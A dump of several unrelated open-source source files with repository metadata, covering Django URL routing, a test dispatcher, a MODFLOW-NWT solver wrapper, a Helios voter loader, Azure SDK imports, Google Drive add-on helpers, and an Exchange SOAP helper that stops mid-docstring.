"name": "Shell",
"bytes": "394"
}
],
"symlink_target": ""
} |
from django.conf.urls import url
from django.views.generic.base import RedirectView
from states.views import state_action_confirm, state_action, state_action_ajax, report, state_history
urlpatterns = [
url(r'^action/confirm/(?P<state_pk>\d+)/(?P<action>.*)/noparam/$', state_action_confirm, {'next': 'state_action_noparam'}, name='state_action_confirm_noparam'),
url(r'^action/confirm/(?P<state_pk>\d+)/(?P<action>.*)/$', state_action_confirm, name='state_action_confirm'),
url(r'^action/(?P<state_pk>\d+)/(?P<action>.*)/noparam/$', state_action, {'no_param': True}, name='state_action_noparam'),
url(r'^action/(?P<state_pk>\d+)/(?P<action>.*)/$', state_action, name='state_action'),
url(r'^ajax/action/$', state_action_ajax, name='state_action_ajax'),
url(r'^history/$', state_history, name='states_state_history'),
url(r'^(?P<content_type>[a-z\._\d+]+)/reports/$', RedirectView.as_view(url='-1/'), name='states_overview'),
url(r'^(?P<content_type>[a-z\._\d+]+)/reports/(?P<report_id>-?\d+)/$', report, name='states_report'),
url(r'^(?P<content_type>[\d+]+)/reports/(?P<report_id>-?\d+)/order_by/(?P<order_column>-?\d+)/(?P<order_direction>[AD])/$', report, name='states_report_order_by'),
]
| {
"content_hash": "bf9be7ee9f82fcd788bf056dcbfce686",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 167,
"avg_line_length": 77,
"alnum_prop": 0.6436688311688312,
"repo_name": "vikingco/django-states",
"id": "dccf81a21fadab7304d46b85672e4f6e4aa50e31",
"size": "1232",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/states/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "9290"
},
{
"name": "Python",
"bytes": "174008"
},
{
"name": "SourcePawn",
"bytes": "204"
}
],
"symlink_target": ""
} |
import logging
from collections import deque
from satori.core.checking.accumulators import accumulators
from satori.core.checking.reporters import reporters
from satori.core.models import Test, TestMapping
class DispatcherBase(object):
def __init__(self, supervisor, test_suite_result):
super(DispatcherBase, self).__init__()
self.supervisor = supervisor
self.test_suite_result = test_suite_result
if test_suite_result.test_suite.accumulators:
accumulator_list = test_suite_result.test_suite.accumulators.split(',')
else:
accumulator_list = []
self.accumulators = [
accumulators[accumulator](test_suite_result) for accumulator in accumulator_list
]
self.reporter = reporters[test_suite_result.test_suite.reporter](test_suite_result)
def init(self):
for accumulator in self.accumulators:
accumulator.init()
self.reporter.init()
def checked_test_results(self, test_results):
raise NotImplementedError
def accumulate(self, test_result):
for accumulator in self.accumulators:
accumulator.accumulate(test_result)
self.reporter.accumulate(test_result)
def status(self):
return all(accumulator.status() for accumulator in self.accumulators) and self.reporter.status()
def finish(self):
for accumulator in self.accumulators:
accumulator.deinit()
self.reporter.deinit()
self.supervisor.finished_test_suite_result(self.test_suite_result)
class SerialDispatcher(DispatcherBase):
"""Serial dispatcher"""
def __init__(self, supervisor, test_suite_result):
super(SerialDispatcher, self).__init__(supervisor, test_suite_result)
self.to_check = deque()
def init(self):
super(SerialDispatcher, self).init()
for test in self.test_suite_result.test_suite.get_tests():
self.to_check.append(test)
self.send_test()
def checked_test_results(self, test_results):
for result in test_results:
assert result.test_id == self.to_check[0].id
self.to_check.popleft()
self.accumulate(result)
if not self.status():
self.finish()
return
self.send_test()
def send_test(self):
if self.to_check:
submit = self.test_suite_result.submit
test = self.to_check[0]
self.supervisor.schedule_test_result(test_suite_result=self.test_suite_result, submit=submit, test=test)
else:
self.finish()
class ParallelDispatcher(DispatcherBase):
"""Parallel dispatcher"""
def __init__(self, supervisor, test_suite_result):
super(ParallelDispatcher, self).__init__(supervisor, test_suite_result)
self.to_check_id = set()
def init(self):
super(ParallelDispatcher, self).init()
submit = self.test_suite_result.submit
for test in self.test_suite_result.test_suite.get_tests():
self.to_check_id.add(test.id)
self.supervisor.schedule_test_result(test_suite_result=self.test_suite_result, submit=submit, test=test)
if not self.to_check_id:
self.finish()
def checked_test_results(self, test_results):
for result in test_results:
assert result.test_id in self.to_check_id
self.to_check_id.remove(result.test_id)
self.accumulate(result)
if not self.status():
self.finish()
if not self.to_check_id:
self.finish()
dispatchers = {}
for item in globals().values():
if isinstance(item, type) and issubclass(item, DispatcherBase) and (item != DispatcherBase):
dispatchers[item.__name__] = item
| {
"content_hash": "3538855798433d331b5622ab6b3352bf",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 116,
"avg_line_length": 36.59615384615385,
"alnum_prop": 0.63977929584866,
"repo_name": "zielmicha/satori",
"id": "f018ab9bb23ee92367685a827ec302937773c9f9",
"size": "3838",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "satori.core/satori/core/checking/dispatchers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "165337"
},
{
"name": "CSS",
"bytes": "72202"
},
{
"name": "HTML",
"bytes": "56647"
},
{
"name": "Java",
"bytes": "270392"
},
{
"name": "JavaScript",
"bytes": "300430"
},
{
"name": "Makefile",
"bytes": "1223"
},
{
"name": "Perl",
"bytes": "1572"
},
{
"name": "Python",
"bytes": "1011796"
},
{
"name": "Shell",
"bytes": "231478"
},
{
"name": "TeX",
"bytes": "17071"
}
],
"symlink_target": ""
} |
"""
mfnwt module. Contains the ModflowNwt class. Note that the user can access
the ModflowNwt class as `flopy.modflow.ModflowNwt`.
Additional information for this MODFLOW package can be found at the `Online
MODFLOW Guide
<http://water.usgs.gov/ogw/modflow-nwt/MODFLOW-NWT-Guide/nwt_newton_solver.htm>`_.
"""
import sys
from ..pakbase import Package
class ModflowNwt(Package):
"""
MODFLOW Nwt Package Class.
Parameters
----------
model : model object
The model object (of type :class:`flopy.modflow.mf.Modflow`) to which
this package will be added.
headtol : float
is the maximum head change between outer iterations for solution of
the nonlinear problem. (default is 1e-4).
fluxtol : float
is the maximum l2 norm for solution of the nonlinear problem.
(default is 500).
maxiterout : int
is the maximum number of iterations to be allowed for solution of the
outer (nonlinear) problem. (default is 100).
thickfact : float
is the portion of the cell thickness (length) used for smoothly
adjusting storage and conductance coefficients to zero.
(default is 1e-5).
linmeth : int
is a flag that determines which matrix solver will be used.
A value of 1 indicates GMRES will be used
A value of 2 indicates XMD will be used.
(default is 1).
iprnwt : int
is a flag that indicates whether additional information about solver
convergence will be printed to the main listing file.
(default is 0).
ibotav : int
is a flag that indicates whether corrections will be made to
groundwater head relative to the cell-bottom altitude if the cell is
surrounded by dewatered cells (integer). A value of 1 indicates that a
correction will be made and a value of 0 indicates no correction will
be made. (default is 0).
options : string
SPECIFIED indicates that the optional solver input values listed for
items 1 and 2 will be specified in the NWT input file by the user.
SIMPLE indicates that default solver input values will be defined that
work well for nearly linear models. This would be used for models that
do not include nonlinear stress packages, and models that are either
confined or consist of a single unconfined layer that is thick enough
to contain the water table within a single layer.
MODERATE indicates that default solver input values will be defined
that work well for moderately nonlinear models. This would be used for
models that include nonlinear stress packages, and models that consist
of one or more unconfined layers. The MODERATE option should be used
when the SIMPLE option does not result in successful convergence.
COMPLEX indicates that default solver input values will be defined
that work well for highly nonlinear models. This would be used for
models that include nonlinear stress packages, and models that consist
of one or more unconfined layers representing complex geology and sw/gw
interaction. The COMPLEX option should be used when the MODERATE option
does not result in successful convergence. (default is COMPLEX).
Continue : bool
if the model fails to converge during a time step then it will continue
to solve the following time step. (default is False). Note the capital
C on this option so that it doesn't conflict with a reserved Python
language word.
dbdtheta : float
is a coefficient used to reduce the weight applied to the head change
between nonlinear iterations. dbdtheta is used to control oscillations
in head. Values range between 0.0 and 1.0, and larger values increase
the weight (decrease under-relaxation) applied to the head change.
(default is 0.4).
dbdkappa : float
is a coefficient used to increase the weight applied to the head change
between nonlinear iterations. dbdkappa is used to control oscillations
in head. Values range between 0.0 and 1.0, and larger values increase
the weight applied to the head change. (default is 1.e-5).
dbdgamma : float
is a factor (used to weight the head change for the previous and
current iteration. Values range between 0.0 and 1.0, and greater values
apply more weight to the head change calculated during the current
iteration. (default is 0.)
momfact : float
is the momentum coefficient and ranges between 0.0 and 1.0. Greater
values apply more weight to the head change for the current iteration.
(default is 0.1).
backflag : int
is a flag used to specify whether residual control will be used. A
value of 1 indicates that residual control is active and a value of 0
indicates residual control is inactive. (default is 1).
maxbackiter : int
is the maximum number of reductions (backtracks) in the head change
between nonlinear iterations (integer). A value between 10 and 50
works well. (default is 50).
backtol : float
is the proportional decrease in the root-mean-squared error of the
groundwater-flow equation used to determine if residual control is
required at the end of a nonlinear iteration. (default is 1.1).
backreduce : float
is a reduction factor used for residual control that reduces the head
change between nonlinear iterations. Values should be between 0.0 and
1.0, where smaller values result in smaller head-change values.
(default 0.7).
maxitinner : int
(GMRES) is the maximum number of iterations for the linear solution.
(default is 50).
ilumethod : int
(GMRES) is the index for selection of the method for incomplete
factorization (ILU) used as a preconditioner. (default is 2).
ilumethod = 1 is ILU with drop tolerance and fill limit. Fill-in terms
less than drop tolerance times the diagonal are discarded. The number
of fill-in terms in each row of L and U is limited to the fill limit.
The fill-limit largest elements are kept in the L and U factors.
ilumethod=2 is ILU(k) order k incomplete LU factorization. Fill-in
terms of higher order than k in the factorization are discarded.
levfill : int
(GMRES) is the fill limit for ILUMETHOD = 1 and is the level of fill
for ilumethod = 2. Recommended values: 5-10 for method 1, 0-2 for
method 2. (default is 5).
stoptol : float
(GMRES) is the tolerance for convergence of the linear solver. This is
the residual of the linear equations scaled by the norm of the root
mean squared error. Usually 1.e-8 to 1.e-12 works well.
(default is 1.e-10).
msdr : int
(GMRES) is the number of iterations between restarts of the GMRES
Solver. (default is 15).
iacl : int
(XMD) is a flag for the acceleration method: 0 is conjugate gradient, 1 is ORTHOMIN,
2 is Bi-CGSTAB. (default is 2).
norder : int
(XMD) is a flag for the scheme of ordering the unknowns: 0 is original
ordering, 1 is RCM ordering, 2 is Minimum Degree ordering.
(default is 1).
level : int
(XMD) is the level of fill for incomplete LU factorization.
(default is 5).
north : int
(XMD) is the number of orthogonalization for the ORTHOMIN acceleration
scheme. A number between 4 and 10 is appropriate. Small values require
less storage but more iterations may be required. This number should
equal 2 for the other acceleration methods. (default is 7).
iredsys : int
(XMD) is a flag for reduced system preconditioning (integer): 0-do not
apply reduced system preconditioning, 1-apply reduced system
preconditioning. (default is 0)
rrctols : int
(XMD) is the residual reduction-convergence criteria. (default is 0.).
idroptol : int
(XMD) is a flag for using drop tolerance in the preconditioning:
0-don't use drop tolerance, 1-use drop tolerance. (default is 1).
epsrn : float
(XMD) is the drop tolerance for preconditioning. (default is 1.e-4).
hclosexmd : float
(XMD) is the head closure criteria for inner (linear) iterations.
(default is 1.e-4).
mxiterxmd : int
(XMD) is the maximum number of iterations for the linear solution.
(default is 50).
extension : list string
Filename extension (default is 'nwt')
unitnumber : int
File unit number (default is None).
filenames : str or list of str
Filenames to use for the package. If filenames=None the package name
will be created using the model name and package extension. If a
single string is passed the package will be set to the string.
Default is None.
Attributes
----------
Methods
-------
See Also
--------
Notes
-----
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow()
>>> nwt = flopy.modflow.ModflowNwt(m)
"""
def __init__(
self,
model,
headtol=1e-2,
fluxtol=500,
maxiterout=100,
thickfact=1e-5,
linmeth=1,
iprnwt=0,
ibotav=0,
options="COMPLEX",
Continue=False,
dbdtheta=0.4,
dbdkappa=1.0e-5,
dbdgamma=0.0,
momfact=0.1,
backflag=1,
maxbackiter=50,
backtol=1.1,
backreduce=0.70,
maxitinner=50,
ilumethod=2,
levfill=5,
stoptol=1.0e-10,
msdr=15,
iacl=2,
norder=1,
level=5,
north=7,
iredsys=0,
rrctols=0.0,
idroptol=1,
epsrn=1.0e-4,
hclosexmd=1e-4,
mxiterxmd=50,
extension="nwt",
unitnumber=None,
filenames=None,
):
if model.version != "mfnwt":
err = "Error: model version must be mfnwt to use NWT package"
raise Exception(err)
# set default unit number of one is not specified
if unitnumber is None:
unitnumber = ModflowNwt.defaultunit()
# set filenames
if filenames is None:
filenames = [None]
elif isinstance(filenames, str):
filenames = [filenames]
# Fill namefile items
name = [ModflowNwt.ftype()]
units = [unitnumber]
extra = [""]
# set package name
fname = [filenames[0]]
# Call ancestor's init to set self.parent, extension, name and unit number
Package.__init__(
self,
model,
extension=extension,
name=name,
unit_number=units,
extra=extra,
filenames=fname,
)
self.heading = (
"# {} package for ".format(self.name[0])
+ " {}, ".format(model.version_types[model.version])
+ "generated by Flopy."
)
self.url = "nwt_newton_solver.htm"
self.headtol = headtol
self.fluxtol = fluxtol
self.maxiterout = maxiterout
self.thickfact = thickfact
self.linmeth = linmeth
self.iprnwt = iprnwt
self.ibotav = ibotav
if isinstance(options, list):
self.options = options
else:
self.options = [options.upper()]
if Continue:
self.options.append("CONTINUE")
self.dbdtheta = dbdtheta
self.dbdkappa = dbdkappa
self.dbdgamma = dbdgamma
self.momfact = momfact
self.backflag = backflag
self.maxbackiter = maxbackiter
self.backtol = backtol
self.backreduce = backreduce
self.maxitinner = maxitinner
self.ilumethod = ilumethod
self.levfill = levfill
self.stoptol = stoptol
self.msdr = msdr
self.iacl = iacl
self.norder = norder
self.level = level
self.north = north
self.iredsys = iredsys
self.rrctols = rrctols
self.idroptol = idroptol
self.epsrn = epsrn
self.hclosexmd = hclosexmd
self.mxiterxmd = mxiterxmd
self.parent.add_package(self)
def write_file(self):
"""
Write the package file.
Returns
-------
None
"""
# Open file for writing
f = open(self.fn_path, "w")
f.write("%s\n" % self.heading)
f.write(
"{:10.3e}{:10.3e}{:10d}{:10.3e}{:10d}{:10d}{:10d}".format(
self.headtol,
self.fluxtol,
self.maxiterout,
self.thickfact,
self.linmeth,
self.iprnwt,
self.ibotav,
)
)
isspecified = False
for option in self.options:
f.write("{0:>10s}".format(option.upper()))
if option.lower() == "specified":
isspecified = True
if isspecified:
f.write("{0:10.4g}".format(self.dbdtheta))
f.write("{0:10.4g}".format(self.dbdkappa))
f.write("{0:10.4g}".format(self.dbdgamma))
f.write("{0:10.4g}".format(self.momfact))
f.write("{0:10d}".format(self.backflag))
if self.backflag > 0:
f.write("{0:10d}".format(self.maxbackiter))
f.write("{0:10.4g}".format(self.backtol))
f.write("{0:10.4g}".format(self.backreduce))
f.write("\n")
if self.linmeth == 1:
f.write("{0:10d}".format(self.maxitinner))
f.write("{0:10d}".format(self.ilumethod))
f.write("{0:10d}".format(self.levfill))
f.write("{0:10.4g}".format(self.stoptol))
f.write("{0:10d}".format(self.msdr))
elif self.linmeth == 2:
f.write("{0:10d}".format(self.iacl))
f.write("{0:10d}".format(self.norder))
f.write("{0:10d}".format(self.level))
f.write("{0:10d}".format(self.north))
f.write("{0:10d}".format(self.iredsys))
f.write("{0:10.4g}".format(self.rrctols))
f.write("{0:10d}".format(self.idroptol))
f.write("{0:10.4g}".format(self.epsrn))
f.write("{0:10.4g}".format(self.hclosexmd))
f.write("{0:10d}".format(self.mxiterxmd))
f.write("\n")
f.close()
@staticmethod
def load(f, model, ext_unit_dict=None):
"""
Load an existing package.
Parameters
----------
f : filename or file handle
File to load.
model : model object
The model object (of type :class:`flopy.modflow.mf.Modflow`) to
which this package will be added.
ext_unit_dict : dictionary, optional
If the arrays in the file are specified using EXTERNAL,
or older style array control records, then `f` should be a file
handle. In this case ext_unit_dict is required, which can be
constructed using the function
:class:`flopy.utils.mfreadnam.parsenamefile`.
Returns
-------
nwt : ModflowNwt object
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow()
>>> nwt = flopy.modflow.ModflowPcg.load('test.nwt', m)
"""
import collections
if model.verbose:
sys.stdout.write("loading nwt package file...\n")
if model.version != "mfnwt":
msg = (
"Warning: model version was reset from "
+ "'{}' to 'mfnwt' in order to load a NWT file".format(
model.version
)
)
print(msg)
model.version = "mfnwt"
openfile = not hasattr(f, "read")
if openfile:
filename = f
f = open(filename, "r")
# dataset 0 -- header
flines = [
line.strip()
for line in f.readlines()
if not line.strip().startswith("#")
]
if openfile:
f.close()
line = flines.pop(0)
# dataset 1
ifrfm = True # model.free_format_input
vars = (
("headtol", float),
("fluxtol", float),
("maxiterout", int),
("thickfact", float),
("linmeth", int),
("iprnwt", int),
("ibotav", int),
("options", str),
("Continue", str),
)
vars = collections.OrderedDict(vars)
kwargs = {}
if ifrfm:
t = line.split()
else:
t = []
try:
for idx, (k, c) in enumerate(vars.items()):
t.append(line[idx * 10 : (idx + 1) * 10])
except:
if model.verbose:
print(" did not parse fixed format dataset 1")
try:
for i, (v, c) in enumerate(vars.items()):
kwargs[v] = c(t[i].strip())
except:
if model.verbose:
print(" did not generate dataset 1 kwargs")
if "Continue" in kwargs:
if "CONTINUE" in kwargs["Continue"].upper():
kwargs["Continue"] = True
else:
kwargs.pop("Continue")
specdict = (
("dbdtheta", float),
("dbdkappa", float),
("dbdgamma", float),
("momfact", float),
("backflag", int),
("maxbackiter", int),
("backtol", float),
("backreduce", float),
)
specdict = collections.OrderedDict(specdict)
ipos = len(kwargs)
if kwargs["options"].lower().strip() == "specified":
for (k, c) in specdict.items():
if ifrfm:
kwargs[k] = c(t[ipos].strip())
else:
kwargs[k] = c(line[ipos * 10 : (ipos + 1) * 10].strip())
if k == "backflag":
if kwargs["backflag"] == 0:
break
ipos += 1
# dataset 2
try:
line = flines.pop(0)
except:
raise Exception(
'Error: OPTIONS set to "Specified" but only one line in NWT file'
)
lindict = {}
if kwargs["linmeth"] == 1:
lindict = (
("maxitinner", int),
("ilumethod", int),
("levfill", int),
("stoptol", float),
("msdr", int),
)
elif kwargs["linmeth"] == 2:
lindict = (
("iacl", int),
("norder", int),
("level", int),
("north", int),
("iredsys", int),
("rrctols", float),
("idroptol", int),
("epsrn", float),
("hclosexmd", float),
("mxiterxmd", int),
)
lindict = collections.OrderedDict(lindict)
if ifrfm:
t = line.split()
else:
t = []
for idx, (k, c) in enumerate(lindict.items()):
t.append(line[idx * 10 : (idx + 1) * 10])
for idx, (k, c) in enumerate(lindict.items()):
# forgive missing value for MXITERXMD (last value)
# (apparently NWT runs without it)
if len(t) > 0:
kwargs[k] = c(t.pop(0))
# determine specified unit number
# set package unit number
unitnumber = None
filenames = [None]
if ext_unit_dict is not None:
unitnumber, filenames[0] = model.get_ext_dict_attr(
ext_unit_dict, filetype=ModflowNwt.ftype()
)
kwargs["unitnumber"] = unitnumber
kwargs["filenames"] = filenames
# create and return an instance of the nwt class
return ModflowNwt(model, **kwargs)
@staticmethod
def ftype():
return "NWT"
@staticmethod
def defaultunit():
return 32
| {
"content_hash": "0d2af315d9a9cae1196be1c163f3cda4",
"timestamp": "",
"source": "github",
"line_count": 567,
"max_line_length": 92,
"avg_line_length": 36.32098765432099,
"alnum_prop": 0.5613771001262504,
"repo_name": "aleaf/flopy",
"id": "c798a9559923d3ffa0567a75998efaf784a2e282",
"size": "20594",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "flopy/modflow/mfnwt.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "67"
},
{
"name": "Python",
"bytes": "5469342"
},
{
"name": "Shell",
"bytes": "2562"
}
],
"symlink_target": ""
} |
"""
parse and set up voters from uploaded voter files
DEPRECATED
Ben Adida
ben@adida.net
2010-05-22
"""
from django.core.management.base import BaseCommand, CommandError
import csv, datetime
from helios import utils as helios_utils
from helios.models import *
##
## UTF8 craziness for CSV
##
def unicode_csv_reader(unicode_csv_data, dialect=csv.excel, **kwargs):
# csv.py doesn't do Unicode; encode temporarily as UTF-8:
csv_reader = csv.reader(utf_8_encoder(unicode_csv_data),
dialect=dialect, **kwargs)
for row in csv_reader:
# decode UTF-8 back to Unicode, cell by cell:
yield [unicode(cell, 'utf-8') for cell in row]
def utf_8_encoder(unicode_csv_data):
for line in unicode_csv_data:
yield line.encode('utf-8')
def process_csv_file(election, f):
reader = unicode_csv_reader(f)
num_voters = 0
for voter in reader:
# bad line
if len(voter) < 1:
continue
num_voters += 1
voter_id = voter[0]
name = voter_id
email = voter_id
if len(voter) > 1:
email = voter[1]
if len(voter) > 2:
name = voter[2]
# create the user
user = User.update_or_create(user_type='password', user_id=voter_id, info = {'password': helios_utils.random_string(10), 'email': email, 'name': name})
user.save()
# does voter for this user already exist
voter = Voter.get_by_election_and_user(election, user)
# create the voter
if not voter:
voter_uuid = str(uuid.uuid1())
voter = Voter(uuid= voter_uuid, voter_type = 'password', voter_id = voter_id, name = name, election = election)
voter.save()
return num_voters
class Command(BaseCommand):
args = ''
help = 'load up voters from unprocessed voter files'
def handle(self, *args, **options):
# load up the voter files in order of last uploaded
files_to_process = VoterFile.objects.filter(processing_started_at=None).order_by('uploaded_at')
for file_to_process in files_to_process:
# mark processing begins
file_to_process.processing_started_at = datetime.datetime.utcnow()
file_to_process.save()
num_voters = process_csv_file(file_to_process.election, file_to_process.voter_file)
# mark processing done
file_to_process.processing_finished_at = datetime.datetime.utcnow()
file_to_process.num_voters = num_voters
file_to_process.save()
| {
"content_hash": "94fbb3fe9fbf5e1f5cf6342ebadaa043",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 157,
"avg_line_length": 28.744444444444444,
"alnum_prop": 0.6165442597603401,
"repo_name": "dmgawel/helios-server",
"id": "5b82285a68650b1a06ae36c0f3bb3dd0cea236e7",
"size": "2587",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "helios/management/commands/load_voter_files.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "15450"
},
{
"name": "HTML",
"bytes": "160246"
},
{
"name": "Java",
"bytes": "2271"
},
{
"name": "JavaScript",
"bytes": "307727"
},
{
"name": "Python",
"bytes": "698297"
},
{
"name": "Shell",
"bytes": "324"
}
],
"symlink_target": ""
} |
from ._operations import Operations
from ._admin_keys_operations import AdminKeysOperations
from ._query_keys_operations import QueryKeysOperations
from ._services_operations import ServicesOperations
from ._private_link_resources_operations import PrivateLinkResourcesOperations
from ._private_endpoint_connections_operations import PrivateEndpointConnectionsOperations
from ._patch import __all__ as _patch_all
from ._patch import * # type: ignore # pylint: disable=unused-wildcard-import
from ._patch import patch_sdk as _patch_sdk
__all__ = [
"Operations",
"AdminKeysOperations",
"QueryKeysOperations",
"ServicesOperations",
"PrivateLinkResourcesOperations",
"PrivateEndpointConnectionsOperations",
]
__all__.extend([p for p in _patch_all if p not in __all__])
_patch_sdk()
| {
"content_hash": "7ab3df75a531a2b56b329827c9eac9d4",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 90,
"avg_line_length": 38.333333333333336,
"alnum_prop": 0.7714285714285715,
"repo_name": "Azure/azure-sdk-for-python",
"id": "5f7e85a6a72d9cc52eb894f675986aba4735418d",
"size": "1273",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "sdk/search/azure-mgmt-search/azure/mgmt/search/aio/operations/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
"""Utility functions for the Google Drive add-on.
"""
import os
import logging
from urllib import quote
from website.util import web_url_for
from website.addons.googledrive.exceptions import ExpiredAuthError
logger = logging.getLogger(__name__)
class GoogleDriveNodeLogger(object):
"""Helper class for adding correctly-formatted Google Drive logs to nodes.
Usage: ::
from website.project.model import NodeLog
file_obj = GoogleDriveGuidFile(path='foo/bar.txt')
file_obj.save()
node = ...
auth = ...
nodelogger = GoogleDriveNodeLogger(node, auth, file_obj)
nodelogger.log(NodeLog.FILE_REMOVED, save=True)
:param Node node: The node to add logs to
:param Auth auth: Authorization of the person who did the action.
:param GoogleDriveGuidFile file_obj: File object for file-related logs.
"""
def __init__(self, node, auth, file_obj=None, path=None):
self.node = node
self.auth = auth
self.file_obj = file_obj
self.path = path
def log(self, action, extra=None, save=False):
"""Log an event. Wraps the Node#add_log method, automatically adding
relevant parameters and prefixing log events with `"googledrive_"`.
:param str action: Log action. Should be a class constant from NodeLog.
:param dict extra: Extra parameters to add to the ``params`` dict of the
new NodeLog.
"""
params = {
'project': self.node.parent_id,
'node': self.node._primary_key,
'folder': self.node.get_addon('googledrive', deleted=True).folder_path
}
if extra:
params.update(extra)
# Prefix the action with googledrive
self.node.add_log(
action="googledrive_{0}".format(action),
params=params,
auth=self.auth
)
if save:
self.node.save()
def serialize_urls(node_settings):
node = node_settings.owner
return {
'files': node.web_url_for('collect_file_trees'),
'config': node.api_url_for('googledrive_config_put'),
'create': node.api_url_for('googledrive_oauth_start'),
'deauthorize': node.api_url_for('googledrive_deauthorize'),
'importAuth': node.api_url_for('googledrive_import_user_auth'),
'folders': node.api_url_for('googledrive_folders'),
'auth': node.api_url_for('googledrive_oauth_start'),
}
def serialize_settings(node_settings, current_user):
"""
View helper that returns a dictionary representation of a GoogleDriveNodeSettings record.
Provides the return value for the googledrive config endpoints.
"""
user_settings = node_settings.user_settings
user_is_owner = user_settings is not None and user_settings.owner == current_user
current_user_settings = current_user.get_addon('googledrive')
valid_credentials = True
if user_settings:
try:
user_settings.fetch_access_token()
except ExpiredAuthError:
valid_credentials = False
ret = {
'nodeHasAuth': node_settings.has_auth,
'userIsOwner': user_is_owner,
'userHasAuth': current_user_settings is not None and current_user_settings.has_auth,
'urls': serialize_urls(node_settings),
'validCredentials': valid_credentials,
}
if node_settings.has_auth:
# Add owner's profile URL
path = node_settings.folder_path
if path is not None:
ret['folder'] = {
'name': '/ (Full Google Drive)' if path == '/' else '/' + path,
'path': '/' + path.lstrip('/'),
}
ret['ownerName'] = user_settings.owner.fullname
ret['urls']['owner'] = web_url_for('profile_view_id', uid=user_settings.owner._id)
return ret
def build_googledrive_urls(item, node, path):
return {
'fetch': node.api_url_for('googledrive_folders', folderId=item['id']),
'folders': node.api_url_for('googledrive_folders', folderId=item['id'], path=path),
}
def to_hgrid(item, node, path):
"""
:param item: contents returned from Google Drive API
:return: results formatted as required for Hgrid display
"""
safe_name = quote(item['title'], safe='')
path = os.path.join(path, safe_name)
serialized = {
'path': path,
'id': item['id'],
'kind': 'folder',
'name': safe_name,
'addon': 'googledrive',
'urls': build_googledrive_urls(item, node, path=path)
}
return serialized
| {
"content_hash": "10564f4d2ce50cbe97377ac2c3d2cf3b",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 93,
"avg_line_length": 32.96402877697842,
"alnum_prop": 0.6195984286337843,
"repo_name": "himanshuo/osf.io",
"id": "4ce583df9076174942bdfd8abdb2867efa3b1c4f",
"size": "4606",
"binary": false,
"copies": "5",
"ref": "refs/heads/develop",
"path": "website/addons/googledrive/utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "78345"
},
{
"name": "HTML",
"bytes": "34188"
},
{
"name": "JavaScript",
"bytes": "885345"
},
{
"name": "Mako",
"bytes": "442634"
},
{
"name": "Python",
"bytes": "2536134"
},
{
"name": "Shell",
"bytes": "234"
}
],
"symlink_target": ""
} |
"""
(c) 2013 LinkedIn Corp. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");?you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software?distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
"""
from lxml.builder import ElementMaker
from ..utils import convert_datetime_to_utc
from ..compat import _unicode
MSG_NS = u'http://schemas.microsoft.com/exchange/services/2006/messages'
TYPE_NS = u'http://schemas.microsoft.com/exchange/services/2006/types'
SOAP_NS = u'http://schemas.xmlsoap.org/soap/envelope/'
NAMESPACES = {u'm': MSG_NS, u't': TYPE_NS, u's': SOAP_NS}
M = ElementMaker(namespace=MSG_NS, nsmap=NAMESPACES)
T = ElementMaker(namespace=TYPE_NS, nsmap=NAMESPACES)
EXCHANGE_DATETIME_FORMAT = u"%Y-%m-%dT%H:%M:%SZ"
EXCHANGE_DATE_FORMAT = u"%Y-%m-%d"
DISTINGUISHED_IDS = (
'calendar', 'contacts', 'deleteditems', 'drafts', 'inbox', 'journal', 'notes', 'outbox', 'sentitems',
'tasks', 'msgfolderroot', 'root', 'junkemail', 'searchfolders', 'voicemail', 'recoverableitemsroot',
'recoverableitemsdeletions', 'recoverableitemsversions', 'recoverableitemspurges', 'archiveroot',
'archivemsgfolderroot', 'archivedeleteditems', 'archiverecoverableitemsroot',
'Archiverecoverableitemsdeletions', 'Archiverecoverableitemsversions', 'Archiverecoverableitemspurges',
)
def exchange_header():
return T.RequestServerVersion({u'Version': u'Exchange2010'})
def resource_node(element, resources):
"""
Helper function to generate a person/conference room node from an email address
<t:OptionalAttendees>
<t:Attendee>
<t:Mailbox>
<t:EmailAddress>{{ attendee_email }}</t:EmailAddress>
</t:Mailbox>
</t:Attendee>
</t:OptionalAttendees>
"""
for attendee in resources:
element.append(
T.Attendee(
T.Mailbox(
T.EmailAddress(attendee.email)
)
)
)
return element
def delete_field(field_uri):
"""
Helper function to request deletion of a field. This is necessary when you want to overwrite values instead of
appending.
<t:DeleteItemField>
<t:FieldURI FieldURI="calendar:Resources"/>
</t:DeleteItemField>
"""
root = T.DeleteItemField(
T.FieldURI(FieldURI=field_uri)
)
return root
def get_item(exchange_id, format=u"Default"):
"""
Requests a calendar item from the store.
exchange_id is the id for this event in the Exchange store.
